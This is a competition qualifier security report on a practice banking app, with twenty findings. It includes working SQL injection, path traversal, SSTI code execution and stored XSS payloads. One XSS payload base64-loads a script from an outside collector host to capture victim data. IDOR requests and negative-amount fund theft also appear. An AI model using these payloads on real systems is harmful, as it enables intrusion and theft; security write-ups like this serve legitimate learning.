QUALIFIERS REPORT

Name: Yousuf Abdullah Fahim

Username: oxf4h1m
Email: Oxf4h1m@[Link]
2

Vuln #1 Critical
Title: Union based SQL injection on /api/search_beneficiaries via POST
parameter search

Vulnerable path:
[Link]

Description:

This vulnerability is a Union-based SQL Injection found in the

/api/search_beneficiaries endpoint via the POST parameter search. It allows an
attacker to inject malicious SQL queries to extract sensitive data from the
database. The impact is significant as an attacker can fully compromise the
confidentiality of the database by retrieving arbitrary data, such as all usernames,
passwords, and emails from the users table, leading to unauthorized access and
a severe breach of user privacy.

Step to reproduce:

1.​ Login to the cha bank account

2.​ In the account dashboard search for beneficiary with following
payload aa' UNION SELECT
full_name,null,email,user_id,password,null FROM
users -- -
3

3.​
Observe the all users details in response from user
table using post request to
/api/search_beneficiaries

POC:

All users table data using union based SQL injection via POST
parameter search on /api/search_beneficiaries.
4

Impact:

The impact of this vulnerability is critical. A successful exploitation allows

an attacker to leverage the application's database connection to execute
arbitrary SQL commands. This directly compromises the confidentiality of
all data stored in the database, including personally identifiable information
(PII), password hashes, session tokens, and financial records. Furthermore,
depending on the privileges of the database user, this could potentially lead
to data Integrity loss (modification or deletion of records) and limited
Availability loss if the attacker were able to execute denial-of-service
queries. This breach can result in severe regulatory fines, reputational
damage, and widespread user account compromise.
5

Vuln #2 Critical
Title: Union based SQL injection on /api/audit_logs via POST parameter
user_agent

Vulnerable path: [Link]

Description:

This vulnerability is a Union-based SQL Injection found in the /api/audit_logs

endpoint via the POST parameter user_agent. It allows an attacker to inject
malicious SQL queries to extract sensitive data from the database. The impact is
significant as an attacker can fully compromise the confidentiality of the
database by retrieving arbitrary data, such as all usernames, passwords, and
emails from the users table, leading to unauthorized access and a severe breach
of user privacy.

Step to reproduce:

1.​ Login to the cha bank account

2.​ In the account dashboard go to audit logs and filter for logs via user
agent with following payload Mozilla' UNION SELECT
null,email,user_id,full_name FROM users -- -
6

4.​
Observe the all users details in response from user
table using post request to /api/audit_logs

POC:

All users table data using union based SQL injection via POST
parameter user_agent on /api/audit_logs.
7

Impact:

The impact of this vulnerability is critical. A successful exploitation allows

an attacker to leverage the application's database connection to execute
arbitrary SQL commands. This directly compromises the confidentiality of
all data stored in the database, including personally identifiable information
(PII), password hashes, session tokens, and financial records. Furthermore,
depending on the privileges of the database user, this could potentially lead
to data Integrity loss (modification or deletion of records) and limited
Availability loss if the attacker were able to execute denial-of-service
queries. This breach can result in severe regulatory fines, reputational
damage, and widespread user account compromise.
8

Vuln #3 Critical
Title: LFI via path traversal on /download via GET parameter file

Vulnerable path: [Link]

Description:

This vulnerability allows an attacker to perform Local File Inclusion (LFI)

through a Path Traversal attack on the /download endpoint via the file
GET parameter. The application fails to properly sanitize or validate user
input, allowing relative directory traversal sequences (../, URL-encoded as
%2e%2e%2f) to access files outside the intended download directory. This
critical flaw exposes the file system structure and allows unauthorized
retrieval of application files.

Step to reproduce:

1.​ Login to the Cha bank

2.​ Visit the following link using your browser
[Link]
oad?file=%2e%2e%2f%2e%2e%[Link]
3.​ Observe that source code of bank application is downloaded

POC:

Source code of [Link] via path traversal

9

Impact:

The impact of this LFI vulnerability is Severe. By leveraging path traversal,

an attacker can read sensitive system files (e.g., /etc/passwd) or, more
critically, the source code of the application (e.g., [Link], configuration
files). Access to source code may reveal hardcoded credentials, API keys,
intellectual property, and the internal logic of the application, which in turn
facilitates the discovery of further, more serious vulnerabilities (like
database credentials or business logic flaws), leading to full system
compromise.
10

Vuln #4 Critical
Title: Broken access control on /api/add_balance lead to Add arbitrary
balance

Vulnerable path:
[Link]

Description:

This vulnerability is a Broken Access Control flaw (often categorized as

Insecure Direct Object Reference (IDOR) or a business logic flaw) found in
the /api/add_balance endpoint. The application fails to properly
implement authorization checks, allowing an authenticated attacker to
provide an arbitrary account number (AC) and a balance amount (BL) in the
POST request body. This allows an attacker to bypass intended restrictions
and successfully execute a privileged operation—adding funds—to any
account, including their own, without administrative credentials.

Step to reproduce:

1.​ Login to the Cha bank

2.​ Copy your account number from the dashboard
3.​ Execute following curl command from your terminal replacing AC
with your account number curl --path-as-is -i -s -k -X $'POST' -H $'Host:
[Link]' -H $'Content-Type:
application/json' -H $'Content-Length: 44' --data-binary
$'{\"AC\":\"100123312938\",\"BL\":\"100000000000000\"}'
$'[Link]
4.​ Observe that your some cash has been added to your account
11

POC:

Account with extra balance added via broken access control on /api/add_balance
12

Impact:

The impact of this vulnerability is Critical, representing a complete failure

of core banking application logic. Successful exploitation allows any
authenticated user to fraudulently inflate their account balance to an
arbitrary amount, leading to direct financial loss for the bank and complete
erosion of the system's integrity and trust. Furthermore, if the attacker can
target other users' accounts, this could lead to widespread disruption of
financial data and legal liability. This flaw is equivalent to unauthorized
administrative access over the financial state of user accounts.
13

Vuln #5 Critical
Title: RCE via SSTI on /calculate-rewards via POST parameter expression

Vulnerable path:
[Link]

Description:

This vulnerability is a Server-Side Template Injection (SSTI) flaw in the

/calculate-rewards endpoint via the expression POST parameter.
The application insecurely processes user input as an executable template,
allowing an attacker to inject template language syntax. By exploiting
internal Python objects and functions, this SSTI escalates directly to
Remote Code Execution (RCE) on the server hosting the application, as
demonstrated by the ability to execute the ls -lra command.

Step to reproduce:

1.​ Log in to the Cha Bank

2.​ Browse and Intercept any API request using Burpsuite. Then send to
repeater
3.​ Replace any raw api request with following raw request (replacing
session cookie) and send to server

POST /calculate-rewards HTTP/2

Host: [Link]
Cookie:
session=eyJhY2NvdW50X251bWJlciI6IjEwMDE4MzM3OTQzMCIsImF1Z
Gl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT52aWN0aW0iL
[Link]-nXFnouMuyl-EH4tVFdY
14

2sM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101
Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Origin: [Link]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

card_type=mastercard&dining=10&groceries=100&travel=10&gas=1000&
other=100&expression=%7b%7b%20self.__init__.__globals__.__builtins__._
_import__('os').popen('ls%20-lra').read()%7d%7d

Payload for SSTI in expression parameter is

%7b%7b%20self.__init__.__globals__.__builtins__.__impor
t__('os').popen('ls%20-la').read()%7d%7d
15

4.​ Observe that output of ls -la command in the response

POC:

RCE via SSTI on /calculate-rewards via POST parameter expression

16

Impact:

The impact is Critical (Maximum Confidentiality, Integrity, and Availability).

Successful RCE grants the attacker full control over the compromised
server's operating system. The attacker can execute arbitrary commands,
leading to data theft (including all application files and database
credentials), installation of backdoors or malware, modification of
application logic, and disruption of service. This vulnerability results in an
immediate and complete system compromise.
17

Vuln #6 Critical
Title: Blind Stored XSS on /api/transfer via POST parameter reference

Vulnerable path: [Link]

Description:

This vulnerability is a Blind Stored Cross-Site Scripting (XSS) flaw in the

/api/transfer endpoint, affecting the reference POST parameter.
The malicious script injected into the transfer reference field is stored
persistently in the application's database and is later rendered and
executed when an unaware victim (often a backend administrator, analyst,
or the transfer recipient) views the transaction details or a related
dashboard. The 'blind' nature means the attacker does not see the payload
execute but confirms it using an external detection service.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Click on transfer money from the user dashboard.
18

3.​ Transfer small amount of tk to victim account with following payload

in reference ''\">><img src=x onError=alert('xss')> img
src=x
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0
Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2I3MiI7ZG9
jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;
onerror=eval(atob([Link]))> (replace blind XSS detector
payload)
19
20

4.​ Now login into the victim account and observe XSS alert . also
from blind XSS detection servers observe victim info.
21

POC:

Successful XSS execution on victim dashboard

Impact:

The impact is Critical. Because the payload is executed on a victim's

machine (which could be a high-privilege administrative user), a successful
XSS exploit can lead to session hijacking (stealing the victim's session
cookie), data exfiltration (reading sensitive information displayed on the
victim's dashboard), and client-side malicious redirects. If executed in an
administrative panel, this breach can result in full compromise of the
application's backend, allowing the attacker to perform actions as the
administrator, such as modifying user data, accessing audit logs, or
escalating privileges further.
22

Vuln #7 Critical
Title: Stored XSS via profile picture upload

Vulnerable path:
[Link]

Description:

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw caused by

insecure file upload handling. The application allows users to upload SVG
files as profile pictures without adequately sanitizing the content. Since
SVG is an XML-based image format, it can contain executable JavaScript
within event handlers (like onload or onclick). The application then
serves this malicious SVG file directly, causing the stored script to execute
in the victim's browser whenever they view the profile.

Step to reproduce:

1.​ Login to the Cha bank account

2.​ Go to settings
3.​ Upload following SVG image as profile picture (save following code
as svg)

<svg xmlns:dc="[Link]
xmlns:cc="[Link]
xmlns:rdf="[Link]
xmlns:svg="[Link]
xmlns="[Link]
xmlns:sodipodi="[Link]
xmlns:inkscape="[Link]
23

width="601" height="601" onload="alert('xss')" onclick="alert(1)">

<metadata
id="metadata18">
<rdf:RDF>
<cc:Work
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="[Link] />
<dc:title></dc:title>
</cc:Work>
</rdf:RDF>
</metadata>

</svg>
4.​ Visit profile picture and observe XSS alert

POC:

Stored XSS on
[Link]
victim00x_img_xss.svg via profile picture upload
24

Impact:

The impact is Critical. Since the payload is stored and executes every time
the profile picture is viewed, an attacker can leverage this XSS to
compromise the accounts of other users or administrators. This allows for
session hijacking (stealing cookies), credential harvesting, redirecting
victims to malicious sites, and performing unauthorized actions on the
victim's behalf (e.g., initiating transfers) by manipulating the browser's
Document Object Model (DOM).
25

Vuln #8 Critical
Title: Broken Access Control on /api/balance via account_number Leads to
PII disclosure and full account info

Vulnerable path: [Link]

Description:

This vulnerability is a Broken Access Control flaw (specifically, an IDOR -

Insecure Direct Object Reference) in the /api/balance endpoint. The
application uses the account_number parameter in the POST request to
fetch account details but fails to perform an authorization check to confirm
that the requesting user owns that account. This permits any authenticated
user to simply change the account_number value to a victim's account
number and retrieve their sensitive financial and personal data.

Step to reproduce:

1.​ Login to Cha bank account.

2.​ Intercept the POST request to /api/balance using burpsuit and send
to repeater
3.​ Change account number to victim account number and send to the
server
26

4.​ Observe victim information in response including victim PII email,

card CVV, balance etc.

POC:

Victims PII using broken access control on /api/balance

27

Impact:

The impact is Critical. This vulnerability results in the unauthorized

disclosure of highly sensitive Personal Identifiable Information (PII) and
financial data (including card CVV, which facilitates financial fraud). The
ability to retrieve arbitrary user data completely compromises the
Confidentiality of all customer records. This leads to a severe breach of
user privacy, potential identity theft, fraudulent transactions, and significant
regulatory and legal liability for the organization.
28

Vuln #9 Critical
Title: Account Takeover via Broken client side OTP generation

Vulnerable path:
[Link]

Description:

This vulnerability is a Broken Authentication flaw in the password reset

mechanism, specifically utilizing a client-side OTP (One-Time Password)
generation/disclosure issue. When a password reset is requested, the
application generates the OTP on the server but then sends the sensitive
OTP value back to the client (attacker's browser) within the response body
or as a parameter of the subsequent request (e.g., to
/api/request_password_reset). This design bypasses the security
intent of an OTP, allowing an attacker to intercept the code and complete
the password reset for any victim without needing access to the victim's
email or phone.

Step to reproduce:

1.​ Navigate to
[Link]
29

2.​ Enter victim user id and click on send otp

3.​ Intercept the post request to /api/request_password_reset and

observe otp in POST parameter, copy otp and forward to server.
30

4.​ Using the copied OTP change the password of victim and login to
the victim account

POC:

​ OTP in client side request.

Impact:
31

The impact is Critical. This vulnerability allows an unprivileged attacker

to perform a complete Account Takeover (ATO) for any user in the system,
including administrators or high-value accounts, simply by knowing the
victim's user ID. This bypasses the multi-factor security measure (OTP) and
leads to the total loss of Confidentiality, Integrity, and Availability for the
compromised account. Since this is a banking application, the attacker
gains access to financial details, PII, and the ability to initiate fraudulent
transactions.

.
32

Vuln #10 Critical

Title: Business logic Error in /api/transfer via POST parameter amount
allows attacker to Steal other User’s balance

Vulnerable path: [Link]

Description:

This vulnerability is a severe Business Logic Error (BLE) in the fund transfer
functionality exposed via the /api/transfer endpoint. The application
fails to properly validate the sign of the amount POST parameter, allowing
an authenticated attacker to submit a negative transfer amount. When
processed, a negative transfer from A to B is incorrectly interpreted by the
system's logic as adding money to A's account while deducting the absolute
value of that amount from B's account, effectively reversing the transaction
flow and allowing the attacker to steal funds from the victim.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Click on transfer money from the user dashboard.
33

3.​ Fill the form and intercept the POST request of /api/transfer after
submit.
4.​ Change amount to a negative value such as -100 and send to server
34

5.​ Observe that your balance is increased in response. And

decreased from victim account

6.​ Follow the above steps 2-3 times for confirmation

POC:
35

Unauthorized fund transfer executed by submitting a negative

value in the amount parameter.

Impact:

The impact is Critical (Maximum Financial Impact). This Business Logic

Error directly leads to financial fraud and the theft of funds from other
users' accounts. The vulnerability compromises the fundamental Integrity
of the banking ledger, allowing an attacker to drain arbitrary amounts from
victim accounts and credit their own account. This flaw results in
immediate, quantifiable financial loss for customers and the bank,
necessitating an emergency patch and extensive audit.
36

Vuln #11 Critical

Title: Business logic Error in /api/international_transfer via POST parameter
amount allows attacker to add arbitrary balance

Vulnerable path:
[Link]

Description:

This vulnerability is a severe Business Logic Error (BLE) in the international

fund transfer functionality exposed via the
/api/international_transfer endpoint. The application fails to
enforce the constraint that the amount POST parameter must be a positive
value. An authenticated attacker can submit a negative amount, which the
server-side logic incorrectly processes as a transaction that credits the
attacker's own account instead of debiting it. This flaw allows the attacker
to arbitrarily add funds to their balance without authorization.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Navigate to
[Link] .
37

3.​ Fill the form and intercept the POST request of

/api/international_transfer after submit.
4.​ Change amount to a negative value such as -100 and send to server
38

5.​ Observe that your balance is increased in response

6.​ Follow the above steps 2-3 times for confirmation

POC:

Successful balance add using negative amount

39

Impact:

The impact is Critical (Maximum Financial Impact). This Business Logic

Error allows any authenticated user to fraudulently inflate their account
balance by submitting negative transfer amounts, leading to direct,
quantifiable financial loss for the bank. The flaw fundamentally
compromises the Integrity of the application's financial records and is
equivalent to an attacker being able to execute unauthorized deposits.
Immediate remediation is required to prevent large-scale financial abuse.
40

Vuln #12 Critical

Title: Business logic Error in /api/pay_bill via POST parameter amount
allows attacker to add arbitrary balance

Vulnerable path: [Link]

Description:

This vulnerability is a severe Business Logic Error (BLE) in the bill payment
functionality exposed via the /api/pay_bill endpoint. The application
fails to validate that the amount POST parameter is a positive value before
processing the transaction. An authenticated attacker can submit a
negative amount, which the server-side logic incorrectly handles, resulting
in the crediting of the attacker's own account balance instead of the
expected debit. This flaw allows the attacker to arbitrarily add funds to their
balance without authorization.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Navigate to
[Link]
41

3.​ Select any category and Fill the form and intercept the POST request
of /api/pay_bill after submit.
4.​ Change amount to a negative value such as -100 and send to server
42

5.​ Observe that your balance is increased in response

6.​ Follow the above steps 2-3 times for confirmation

POC:

Successful balance add using negative amount

43

Impact:

The impact is Critical (Maximum Financial Impact). This Business Logic

Error allows any authenticated user to fraudulently credit their account
balance repeatedly by submitting negative payment amounts. This flaw
compromises the fundamental Integrity of the application's financial ledger
and directly leads to financial loss for the bank. Immediate correction is
mandatory to prevent unauthorized fund manipulation and systemic abuse.
44

Vuln #13 Critical

Title: Broken Access Control (BAC/IDOR) on /api/delete_beneficiary via
beneficiary_id Leads to delete any beneficiary of other users

Vulnerable path:
[Link]

Description:

This vulnerability is a Broken Access Control flaw, specifically an Insecure

Direct Object Reference (IDOR), in the /api/delete_beneficiary
endpoint. The application uses the beneficiary_id POST parameter to
identify the object to delete but fails to perform an authorization check to
verify that the current user owns that beneficiary ID. This allows any
authenticated attacker to supply a victim's beneficiary ID and successfully
delete it, causing unauthorized data loss and disruption to the victim's
account functionality.

Step to reproduce:

1.​ Login to Cha bank account.

2.​ Intercept and Replace any raw api request with following raw request
with victim beneficiary id (replacing session cookie) and send to
server or intercept the beneficiary delete request

POST /api/delete_beneficiary HTTP/2

Host: [Link]
Cookie:
45

session=eyJhY2NvdW50X251bWJlciI6IjEwMDEyMzMxMjkzOCIsImF1ZGl
0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT57ezcqN319Iiwi
[Link].Xc3H5DwqQuL_jOfZyo5Od
Uj3CFg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101
Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/json
Content-Length: 23
Origin: [Link]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"beneficiary_id":4803}

3.​ Change beneficiary_id in POST body to victim beneficiary_id and

send to the server (use beneficiary id from victim account for
confirmation)
46

4.​ Observe that the Beneficiary deleted successfully.

POC:

Beneficiary deleting using broken access control on

/api/delete_beneficiary
47

Impact:

The impact is Critical. This vulnerability allows an attacker to cause

unauthorized data loss and impair the functionality of other users'
accounts. By deleting beneficiaries, the attacker disrupts the victim's ability
to easily make future financial transfers, causing a loss of Integrity and
Availability of user-defined data. This breach of trust and core security
principle severely affects the application's reliability.
48

Vuln #14 Critical

Title: Broken Access Control (BAC/IDOR) on
/api/cancel_scheduled_transfer via transfer_id Leads to cancel any
scheduled transfer of other users

Vulnerable path:
[Link]
r

Description:

This vulnerability is a Broken Access Control flaw, specifically an Insecure

Direct Object Reference (IDOR), in the
/api/cancel_scheduled_transfer endpoint. The application uses
the transfer_id POST parameter to identify the scheduled transfer but
lacks crucial authorization checks to verify the requesting user is the
owner of that transfer ID. This allows any authenticated attacker to supply a
victim's transfer ID and successfully cancel the victim's future scheduled
payments, causing unauthorized data modification and financial disruption.

Step to reproduce:

1.​ Login to Cha bank account.

2.​ Intercept and Replace any raw api request with following raw request
with victim transfer_id (replacing session cookie) and send to server
or intercept the scheduled transfer cancel request

POST /api/cancel_scheduled_transfer HTTP/2

49

Host: [Link]
Cookie:
session=eyJhY2NvdW50X251bWJlciI6IjEwMDE4MzM3OTQzMCIsImF1Z
Gl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT52aWN0aW0iL
[Link].d2g-FO9jg-QuEPIRrbY_K8nqe-
w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101
Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/json
Content-Length: 19
Origin: [Link]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
Priority: u=0
Te: trailers

{"transfer_id":271}

3.​ Change transfer_id in POST body to victim transfer_id and send to

the server (use transfer_id from victim account for confirmation)
50

4.​ Observe that the Scheduled transfer cancelled successfully.

POC:

Scheduled transfer cancelling using broken access control on

/api/cancel_scheduled_transfer
51

Impact:

The impact is Critical. This flaw allows an attacker to manipulate the

financial operations of other users, leading to the disruption of scheduled
payments (loss of Availability and Integrity). This can cause victims to
incur late fees, service cutoffs, or other financial penalties due to payments
not being executed. The ability to arbitrarily cancel a core financial function
severely compromises user trust and the reliability of the banking
application.
52

Vuln #15 Critical

Title: Broken Access Control (BAC/IDOR) on /api/generate_statement via
account_number Leads to create and download balance statement

Vulnerable path:
[Link]

Description:

This vulnerability is a Broken Access Control flaw, specifically an Insecure

Direct Object Reference (IDOR), found in the
/api/generate_statement endpoint. The application uses the
account_number POST parameter to specify which account statement to
generate, but it lacks proper authorization checks. This allows any
authenticated attacker to provide a victim's account number and
successfully trigger the generation and subsequent download of that
victim's financial statement, leading to unauthorized access to sensitive
financial history.

Step to reproduce:

1.​ Login to Cha bank account.

2.​ Intercept and Replace any raw api request with following raw request
with victim account_number (replacing session cookie) and send to
server or intercept the generate statement request

POST /api/generate_statement HTTP/2

Host: [Link]
53

Cookie:
session=eyJhY2NvdW50X251bWJlciI6IjEwMDE4MzM3OTQzMCIsImF1
ZGl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT52aWN0aW
[Link].d2g-FO9jg-QuEPIRrbY_K
8nqe-w
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101
Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/json
Content-Length: 33
Origin: [Link]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
Priority: u=0
Te: trailers

{"account_number":"100183379430"}

3.​ Change account_number in POST body to victim account_number

and send to the server (use account_number from victim account for
confirmation)
54

4.​ Observe that the statement is generated successfully.

5.​ Now download the statement using following url (replacing the pdf
file name )
[Link]
oad?file=statement_100183379430_20251122162140.pdf

POC:

statement is generation using broken access control on

/api/generate_statement
55

Impact:

The impact is Critical. This vulnerability allows an attacker to gain full

access to a victim's financial history and personal data (e.g., transaction
details, full name, address, and balance over time) stored within the bank
statements. This results in a massive breach of Confidentiality and
provides attackers with data that can be used for sophisticated social
engineering or identity theft, severely compromising user privacy and trust
in the banking service.
56

Vuln #16 Critical

Title: Broken Access Control (BAC/IDOR) on /api/transaction_logs via GET
parameter account Leads to access others users transaction_logs

Vulnerable path:
[Link]

Description:

This vulnerability is a Broken Access Control flaw, specifically an Insecure

Direct Object Reference (IDOR), in the /api/transaction_logs
endpoint. The application relies on the account GET parameter to retrieve
transaction data but fails to validate ownership. Any authenticated attacker
can modify the account parameter with a victim's account number and
successfully bypass authorization, gaining unauthorized access to the
victim's complete financial transaction history.

Step to reproduce:

1.​ Login to Cha bank account.

2.​ Navigate to the following url
[Link]
ransaction_logs?account=100123312938
3.​ Change account in GET param to victim account_number and send to
the server (use account_number from victim account for
confirmation)
4.​ Observe that the transaction logs of victim in response.
57

POC:

Transaction logs of users using broken access control on

/api/transaction_logs
58

Impact:

The impact is Critical. This IDOR vulnerability directly compromises the

Confidentiality of all users' financial records. An attacker can access
sensitive, private transaction data, revealing spending habits, financial
relationships, and potentially large-scale PII (Personal Identifiable
Information) when correlated with other findings. This level of financial
data disclosure is severe, leading to profound user privacy breaches,
potential regulatory penalties, and a complete loss of trust in the platform.
59

Vuln #17 Critical

Title: Business logic Error in /api/transfer via POST parameter
transaction_charge allows attacker to control transaction_charge

Vulnerable path: [Link]

Description:

This vulnerability is a Business Logic Error (BLE) in the fund transfer

functionality exposed via the /api/transfer endpoint. The application
fails to validate or enforce server-side calculation of the transaction
charge, instead allowing the user to supply this value via the
transaction_charge POST parameter. This permits an authenticated
attacker to inject a controlled, low, or even negative charge, effectively
avoiding the intended fee structure and potentially receiving a refund for
the fee, compromising the bank's revenue model.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Click on transfer money from the user dashboard.
60

3.​ Fill the form and intercept the POST request of /api/transfer after
submit.
4.​ Add a parameter transaction_charge with a negative value such as
-100 and send to server
61

5.​ Observe that supplied transaction_charge is not deducted from the

balance. Attacker can use this vuln to decrease transaction_charge

6.​ Follow the above steps 2-3 times for confirmation

POC:

Successfully controlled the transaction charge

62

"transaction_charge":-1000

Impact:

The impact is Critical (Financial Integrity). This Business Logic Error allows
any authenticated user to bypass the bank's intended revenue mechanism
by eliminating or even reversing transaction fees. This leads to direct,
continuous financial loss for the bank and undermines the fundamental
Integrity of the application's core financial rules. The vulnerability can be
exploited at scale to execute numerous fee-free transactions, causing
significant revenue leakage.
63

Vuln #18 Critical

Title: Business logic Error in /api/international_transfer via POST parameter
transaction_charge allows attacker to control transaction_charge

Vulnerable path:
[Link]

Description:

This vulnerability is a Business Logic Error (BLE) in the international

transfer functionality exposed via the /api/international_transfer
endpoint. The application fails to properly validate or enforce the
server-side calculation of the transaction fee, allowing the user to inject a
controlled fee value via the transaction_charge POST parameter. This
flaw permits an authenticated attacker to bypass the bank's fee structure
by setting a nominal, zero, or even a negative charge, effectively
compromising the intended financial logic and revenue stream.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Navigate to
[Link] .
64

3.​ Fill the form and intercept the POST request of

/api/international_transfer after submit.
4.​ Add a parameter transaction_charge with a negative value such as
-100 and send to server
65

5.​ Observe that supplied transaction_charge is not deducted from the

balance. Attacker can use this vuln to decrease transaction_charge

6.​ Follow the above steps 2-3 times for confirmation

POC:

Successfully controlled the transaction charge

66

Impact:

The impact is Critical (Financial Integrity). This Business Logic Error allows
any authenticated user to bypass and control the bank's intended revenue
mechanism for international transfers. By eliminating or reversing
transaction fees, the vulnerability leads to direct, continuous financial loss
for the bank and fundamentally compromises the Integrity of the
application's financial rules. The ability to execute fee-free transactions can
be scaled, resulting in significant revenue leakage and system abuse.
67

Vuln #19 Critical

Title: Business logic Error in /api/pay_bill via POST parameter
transaction_charge allows attacker to control transaction_charge

Vulnerable path: [Link]

Description:

This vulnerability is a Business Logic Error (BLE) in the bill payment

functionality exposed via the /api/pay_bill endpoint. The application
insecurely allows an authenticated attacker to introduce and control the
transaction_charge POST parameter. Instead of the charge being
calculated and enforced server-side, the system uses the client-supplied
value, permitting the attacker to set a nominal, zero, or even a negative
charge. This flaw allows users to bypass intended fees and potentially gain
unauthorized credits.

Step to reproduce:

1.​ Login to Cha bank account

2.​ Navigate to
[Link]
68

3.​ Select any category and Fill the form and intercept the POST request
of /api/pay_bill after submit.
4.​ Add a parameter transaction_charge with a negative value such as
-100 and send to server
69

5.​ Observe that supplied transaction_charge is not deducted from the

balance. Attacker can use this vuln to decrease transaction_charge

6.​ Follow the above steps 2-3 times for confirmation

POC:

Successful balance add using negative amount

70

Impact:

The impact is Critical (Financial Integrity). This Business Logic Error allows
any authenticated user to bypass the bank's intended fee structure for bill
payments, leading to direct, continuous revenue loss for the bank. By
controlling the fee, the attacker compromises the financial rules of the
system, which can be scaled to execute numerous fee-free transactions,
significantly impacting the application's profitability and reliability.
71

Vuln #20 Medium

Title: HTML injection via email

Vulnerable path:
[Link]

Description:

This vulnerability is an HTML Injection flaw occurring during the account

registration process. The application fails to properly sanitize the user's
input in the name field before incorporating it into an outbound email (e.g.,
a welcome email or notification sent to the victim user). This allows an
attacker to inject arbitrary HTML tags, such as <h1>, which are then
rendered by the victim's email client, leading to a defacement or change in
the email's appearance.

Step to reproduce:

1.​ Register an account with html h1 tags in name field such as ‘“><h1>
test
72

2.​ Observe an email with HTML injected in victim email

POC:

HTML injection in email

73

Impact:

The impact of standard HTML Injection in an email is generally rated as

Low to Medium. The primary risks are reputational damage and
defacement, as an attacker can manipulate the look and feel of official
emails. However, if the victim's email client (or webmail interface) does not
strictly sanitize HTML, this flaw could potentially be leveraged for phishing
or escalation to a self-executing XSS payload, although that requires a
specific environment and is a higher-risk scenario.
74